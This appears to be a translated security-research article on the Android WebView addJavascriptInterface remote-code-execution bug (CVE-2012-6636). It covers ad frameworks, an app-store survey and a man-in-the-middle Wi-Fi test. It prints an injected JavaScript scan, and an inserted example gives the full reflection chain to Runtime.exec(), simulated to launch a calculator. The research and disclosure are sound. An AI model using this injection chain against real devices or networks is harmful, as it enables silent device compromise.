You walk into a coffee shop and sit down. While you wait for your coffee, you take out your smartphone and start playing a game you downloaded a few days ago. Then you go back to work and check your mail in the lift. Without your knowledge, an attacker has obtained the address of your corporate network and is quietly infecting all of your colleagues' smartphones.

Privilege escalation on Android (and the convention of "rooting" devices) is well known, but remote code execution is a rarer and far more dangerous class of vulnerability: it lets an attacker run code of their choosing on the user's device without any authorisation. What makes this bug especially interesting is that, even though it was fixed 18 months ago, it can still be exploited on the latest Android devices with every patch installed. Before getting into the details, some background on the bug:
Background knowledge

It started in 2012 with a remote code execution bug in the WebView addJavascriptInterface API, CVE-2012-6636. The bug lets JavaScript loaded into a WebView gain far more access to the system than the developer intended, by using reflection on the exposed Java object. Bad enough on its own. A few months later, researchers at MWR showed that a large number of apps use ad vendors' frameworks, that these frameworks are commonly affected by the bug, and that they download JavaScript code over the network while the app is running.
Not fixed yet?

Android 4.2 fixed this JavaScript vulnerability. Unfortunately, for backwards compatibility, the fix only closes the hole in one particular scenario, and the reality of Android version fragmentation and the ad-funded business model means that scenario is not the common one. We checked 100,000 APK files from Google Play and found that roughly 12% are still at risk even when running on the latest Android devices.

APK analysis results: half of the apps are not at risk because their target SDK version is 17 or higher; a further 31% do not use the vulnerable API at all; 7% could not be analysed because of APK obfuscation or analysis errors. On top of that, more than 50% of Android devices still run versions below 4.2, where the fix does not exist at all: for those devices there is no remedy, and they remain exposed regardless of what the app does.
Technical points

For the fix to take effect, the app that calls addJavascriptInterface must be built with a target API level of 17 or higher, i.e. it must target Android 4.2 or later (from that level on, only methods annotated with @JavascriptInterface are exposed to JavaScript). To stay compatible with as many devices as possible, apps and frameworks are routinely built against the lowest API level they can get away with. The consequence is that even on a patched Android 4.2, 4.3 or 4.4 device, such an app remains exploitable.

The ad-funded business model is dominant on Android: the app is free and the developer earns revenue by showing ads to users. There are more than 50 different ad frameworks for Android, which makes it easy for developers to add advertising, and in practice apps often embed more than one (we found 20% of apps using more than one). Most of these frameworks behave the same way: they download JavaScript libraries over plain HTTP when the app first runs. So apps routinely fetch unauthenticated JavaScript and run it in an environment where it can execute arbitrary code.
Code execution means unrestricted access to the device

So far the vulnerability only lets an attacker execute code inside the context of one Android app. That is bad, but the Android permission model still confines the attacker to that app's data. Once an attacker has a foothold on the system, though, additional privilege escalation is the likely next step. Take the futex vulnerability (CVE-2014-3153) as an example: it affects every version of the Linux kernel currently in use, Android included, and was used for the first successful root of the Galaxy S5. Although the two are not equivalent, we should get into the habit of treating "remote code execution" and "root privilege" as the same severity level, because sooner or later a determined attacker will chain one to the other and gain full control of the device.
Exploitation in the real world

We randomly downloaded 102,189 free apps from the Play Store, and static analysis found that 12.8% of them are potentially vulnerable: these APKs use both a target API level below 17 and the addJavascriptInterface API. Their addJavascriptInterface calls are in fact exploitable by a man-in-the-middle attack, which can be mounted whenever the JavaScript they run is downloaded from the Internet over an insecure channel.
Testing the apps for the vulnerability

We set up a WiFi access point (AP) that acts as a transparent web proxy man-in-the-middle. It injects malicious code into any script requested over HTTP by any device connected to the AP. We password-protected the AP so that nobody would be exposed by accident, but the same method works on any publicly accessible AP. Even without control of the AP, techniques such as DNS poisoning or ARP cache spoofing can put an attacker in the middle, as can a rogue AP that impersonates a legitimate one. In other words, there are many ways to become a man-in-the-middle, and anyone using WiFi through ours passes through our proxy.

The dynamic nature of JavaScript means we do not need to target a particular app or ad framework. At run time the injected code scans the entire JavaScript namespace for objects, looks for ones that were exposed unsafely through the addJavascriptInterface API, and tests each for the vulnerability. If none is found it exits silently without affecting the app. If it succeeds, it runs a shell command that launches the calculator app. The injected JavaScript fragment:
    function findVulnerableObject() {
        for (var prop in window) {
            try {
                // If getClass() doesn't throw, the object is vulnerable
                window[prop].getClass();
                return window[prop];
            }
            catch (err) {}
        }
        return null;
    }
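To show how the injected script works end to end, here is an added example that is not part of the original article: it reuses the same namespace scan, then applies the widely published reflection chain for CVE-2012-6636 (bridge.getClass().forName("java.lang.Runtime").getMethod("getRuntime").invoke(null).exec(cmd)) to reach Runtime.exec(). Because it runs under Node.js rather than inside a WebView, the Java bridge objects, the window object and the calculator launch command are constructed stand-ins; the names adBridge, makeVulnerableBridge, makeSafeBridge and CALC_CMD are assumptions, not identifiers from the article.

```javascript
// Added example (not from the original article). Runs under Node.js with the
// Java side of the WebView bridge simulated; on a real device window.<bridge>
// would be a java.lang.Object exposed through addJavascriptInterface.

// Constructed stand-in for a bridge registered by an app built with
// targetSdkVersion < 17: every public method of java.lang.Object, including
// getClass(), is reachable from JavaScript, so reflection is possible.
function makeVulnerableBridge(log) {
  const runtime = {
    // Records the command instead of spawning a process.
    exec(cmd) { log.push(cmd); return { pid: 1 }; }
  };
  const runtimeClass = {
    getMethod(name) {
      if (name !== 'getRuntime') throw new Error('NoSuchMethodException: ' + name);
      return { invoke() { return runtime; } };
    }
  };
  const objectClass = {
    forName(name) {
      if (name !== 'java.lang.Runtime') throw new Error('ClassNotFoundException: ' + name);
      return runtimeClass;
    }
  };
  return {
    showToast(msg) { log.push('toast:' + msg); }, // the method the app meant to expose
    getClass() { return objectClass; }            // inherited from java.lang.Object
  };
}

// Constructed stand-in for the same bridge once the app targets API 17+ and
// annotates showToast with @JavascriptInterface: getClass() is no longer visible.
function makeSafeBridge(log) {
  return { showToast(msg) { log.push('toast:' + msg); } };
}

// The article's scan, extended to return every reachable bridge. Reading a
// global can itself throw (e.g. a cross-origin frame), so the property read
// sits inside the try as well; plain JS objects fail the getClass() call.
function findVulnerableObjects(win) {
  const found = [];
  for (const prop in win) {
    try {
      win[prop].getClass();   // throws unless prop is a reflectable Java object
      found.push(prop);
    } catch (err) {
      // not vulnerable (or not readable); keep scanning
    }
  }
  return found;
}

// The published reflection chain for CVE-2012-6636: from any Java object,
// climb to java.lang.Runtime and call exec(). The Java API shape is assumed.
function runViaBridge(bridge, cmd) {
  return bridge.getClass()
    .forName('java.lang.Runtime')
    .getMethod('getRuntime', null)
    .invoke(null, null)
    .exec(cmd);
}

// The whole injected payload: scan, exit silently if nothing is reachable,
// otherwise run cmd through the first vulnerable bridge. Returns the bridge name.
function payload(win, cmd) {
  const names = findVulnerableObjects(win);
  if (names.length === 0) return null;   // app not vulnerable: no side effects
  runViaBridge(win[names[0]], cmd);
  return names[0];
}

// Assumed shell command for launching the stock AOSP calculator.
const CALC_CMD = 'am start -n com.android.calculator2/.Calculator';

// Constructed "window" standing in for the WebView's global scope.
function simulate(vulnerable) {
  const log = [];
  const win = {
    document: { title: 'ad' },                                // ordinary DOM object
    get brokenGlobal() { throw new Error('SecurityError'); }, // reading it throws
    adBridge: vulnerable ? makeVulnerableBridge(log) : makeSafeBridge(log)
  };
  return { hit: payload(win, CALC_CMD), log };
}

console.log(simulate(true));   // { hit: 'adBridge', log: [ 'am start -n com.android.calculator2/.Calculator' ] }
console.log(simulate(false));  // { hit: null, log: [] }
```

The safe case is the one that matters for the fix: with the app targeting API 17 and the bridge method annotated, getClass() is simply absent from the JavaScript side, the scan finds nothing and the payload exits without side effects, which is exactly why the article's injected fragment can be sprayed at every HTTP script without first identifying the app.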
After setting up the AP, I randomly selected some of the 13,119 apps labelled as potentially vulnerable and installed them on a Nexus 5 (running Android 4.4.3) and a Samsung XE700T (an x86 tablet running AOSP 4.2), both connected to the AP. By launching each app and performing some simple interactions, remote code execution was triggered in more than half of them: they loaded the malicious code injected by the man-in-the-middle proxy.
It's all advertising

Looking at the TCP/IP packet traces, it quickly became clear that ad frameworks were the culprit, combining addJavascriptInterface with insecure HTTP downloads. None of the frameworks we investigated use HTTPS, which means every app that embeds them downloads JavaScript insecurely. (Previous research has shown that 17% of apps use HTTPS incorrectly, so HTTPS alone is no guarantee either.) We checked a sample of apps to see which ad frameworks they use: AdMob is the most common, but we found that many of the frameworks in use still call addJavascriptInterface unsafely. More than 80% of the free apps we checked include at least one ad framework. Overall, we identified 4,190 ad framework instances across 2,140 apps.
How serious is the problem?

Google publishes an approximate download count for every app on the Play Store. The small number of apps we manually confirmed as vulnerable alone account for more than 150 million downloads. That does not translate into 150,000,000 vulnerable devices, since one device may have several vulnerable apps installed. But given that about 10% of the apps we analysed are potentially vulnerable, and that more than 50% of the ones we tested in practice were confirmed exploitable, there are a great many vulnerable devices out there. Also remember that 57% of Android devices run versions below 4.2, so even if every vulnerable app and framework were patched tomorrow, more than half of Android devices would still be unable to benefit from the fix. Once remote code execution is in hand, it is not much of a leap to the disaster scenario from the coffee shop at the start. Combined with a matching root exploit, a compromised device becomes a man-in-the-middle of its own on whatever network it joins next, and the attack starts to propagate.
Cross-referencing with Device Analyzer data

Device Analyzer is another source of statistics about Android devices. One of the things it tracks is how frequently users launch different apps. Cross-referencing its data with our list of potentially vulnerable apps gives the following results:
[Figure: average number of potentially vulnerable apps opened per user per day]

The Device Analyzer data shows that users open, on average, 0.4 to 0.5 potentially vulnerable apps per day, so the average user runs an exploitable app several times a week. We cannot assume that the app versions on users' devices match the ones we analysed, so once our sample falls behind the latest releases the graph drops sharply; if we re-ran the analysis on the newest APK versions we would probably still see it at around 0.4. The Device Analyzer sample is fairly small, but it lets us say something about Android devices in general, which is otherwise difficult.

Using a relatively simple man-in-the-middle proxy, and without targeting any specific app or device, we can remotely run code inside vulnerable apps even on fully patched Android devices. Static analysis found that a significant percentage of apps are likely to be vulnerable, and we confirmed that more than half of a random sample of them are in fact exploitable.
How hackers can remotely compromise your Android phone